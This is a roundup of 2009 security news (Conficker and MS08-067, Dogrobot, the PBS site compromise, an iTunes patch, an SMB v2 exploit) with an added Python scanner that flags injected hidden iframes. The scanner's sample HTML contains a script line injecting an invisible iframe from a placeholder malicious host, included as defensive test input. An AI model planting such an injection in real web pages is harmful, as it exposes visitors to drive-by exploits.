From Gimmiv to Conficker: MS08-067 Under The Microscope

GENEVA — The critical MS08-067 vulnerability used by the Conficker worm to build a powerful botnet continues to be a lucrative security hole for cybercriminals.
During a presentation at the Virus Bulletin 2009 conference here, a trio of Microsoft researchers dissected the malware attacks linked to MS08-067 and found that criminal gangs are still exploiting the flaw to plant data-theft Trojans on vulnerable Windows machines.

Dogrobot Malware Penetrates System Restore on Windows

GENEVA — Cybercrime gangs in China are penetrating the hard disk recovery cards on computers in Internet cafes and using a combination of zero-day flaws, rootkits and ARP spoofing techniques to steal billions of dollars worth of online gaming credentials.
According to Microsoft anti-virus researcher Chun Feng, five generations of the Win32/Dogrobot malware family have perfected the novel rootkit technique to hijack System Restore on Windows — effectively allowing the malicious file to survive even after the compromised machine is reverted to its previous clean state.

PBS Website Compromised, Used to Serve Exploits

Some sections of the popular Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.
According to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.
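The injection pattern described above (a script that writes a hidden iframe pointing at an exploit-serving domain) is easy to miss when reading page source by eye. The scanner below is an added example, not Purewire's tooling or anything from the PBS site: it scans raw HTML for iframes that are written from inside a script block, point off-site, or are sized or styled to be invisible. The sample page is constructed, and `SITE_HOST` is an assumed value for the legitimate host.

```python
"""Flag iframes that look like drive-by exploit injections.

Added example; the sample HTML is constructed and the domains are placeholders.
Scanning is done with regular expressions over the raw source rather than an
HTML parser, because an iframe inside document.write('...') is script text and
a DOM parser would not see it as a tag.
"""
import re
from urllib.parse import urlparse

SITE_HOST = "www.pbs.org"  # assumption: the host the page legitimately belongs to

# Constructed sample: one legitimate embedded player, one injected hidden frame.
SAMPLE_HTML = """
<html><body>
<h1>Nature</h1>
<iframe src="https://www.pbs.org/video/player" width="640" height="360"></iframe>
<script>
document.write('<iframe src="http://evil-example.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>');
</script>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# name="double quoted" | name='single quoted' | name=bare
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def _attrs(tag: str) -> dict:
    """Return the attributes of one opening tag as a lower-cased dict."""
    out = {}
    for m in ATTR_RE.finditer(tag):
        val = next(g for g in m.groups()[1:] if g is not None)
        out[m.group(1).lower()] = val
    return out


def _reasons(attrs: dict, site_host: str, in_script: bool) -> list:
    """Collect the reasons a single iframe looks suspicious (empty if none)."""
    reasons = []
    host = urlparse(attrs.get("src", "")).hostname
    if host and host != site_host and not host.endswith("." + site_host):
        reasons.append(f"off-site src {host}")
    if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
        reasons.append("zero-size frame")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by style")
    if in_script:
        reasons.append("written from script")
    return reasons


def scan_html(html: str, site_host: str = SITE_HOST) -> list:
    """Return one finding per suspicious iframe: {'src': ..., 'reasons': [...]}."""
    script_spans = [(m.start(), m.end()) for m in SCRIPT_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = _attrs(m.group(0))
        in_script = any(s <= m.start() < e for s, e in script_spans)
        reasons = _reasons(attrs, site_host, in_script)
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f["src"], "->", ", ".join(f["reasons"]))
```

Run against the sample, only the script-written frame is reported; the legitimate 640x360 player on the site's own host produces no finding. A relative `src` has no hostname and is never counted as off-site, so a real deployment would want to add the page's own URL to resolve it.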

Apple has shipped iTunes 9.0.1 to fix a critical security hole that puts Mac and Windows users at risk of computer takeover attacks.
The vulnerability could be used by hackers to launch code execution attacks via booby-trapped “.pls” files, Apple warned in an advisory.

Security researchers at penetration testing firm Immunity have created a reliable remote exploit capable of spawning a worm through an unpatched security hole in Microsoft’s dominant Windows operating system.

A team of exploit writers led by Kostya Kortchinsky attacked the known SMB v2 vulnerability and created a remote exploit that’s been fitted into Immunity’s Canvas pen-testing platform. The exploit hits all versions of Windows Vista and Windows Server 2008 SP2, according to Immunity’s Dave Aitel.

Mozilla’s move to nudge Firefox users into updating the browser’s Flash Player plug-in has been a phenomenal success with about 10 million users clicking through to the Web page with Adobe’s patch.

Mozilla released some brief statistics to track the success of its new program, which serves up a visual warning to Firefox users if their version of the ever-present Adobe Flash Player plug-in is out of date. The program started last week with the releases of Firefox 3.5.3 and Firefox 3.0.14.

A new botnet has caused a sharp spike in click fraud because it is skirting the most sophisticated filters of search engines, Web publishers and ad networks, according to Click Forensics.
The company, which provides services to monitor ad campaigns for click fraud and reports on click fraud incidence every quarter, said on Thursday that the botnet’s architects have figured out a way to mask it particularly well as legitimate search ad traffic.

Four months after it modified Windows 7 to stop the Conficker worm from spreading through infected flash drives, Microsoft has ported the changes to older operating systems, including Windows XP and Vista.
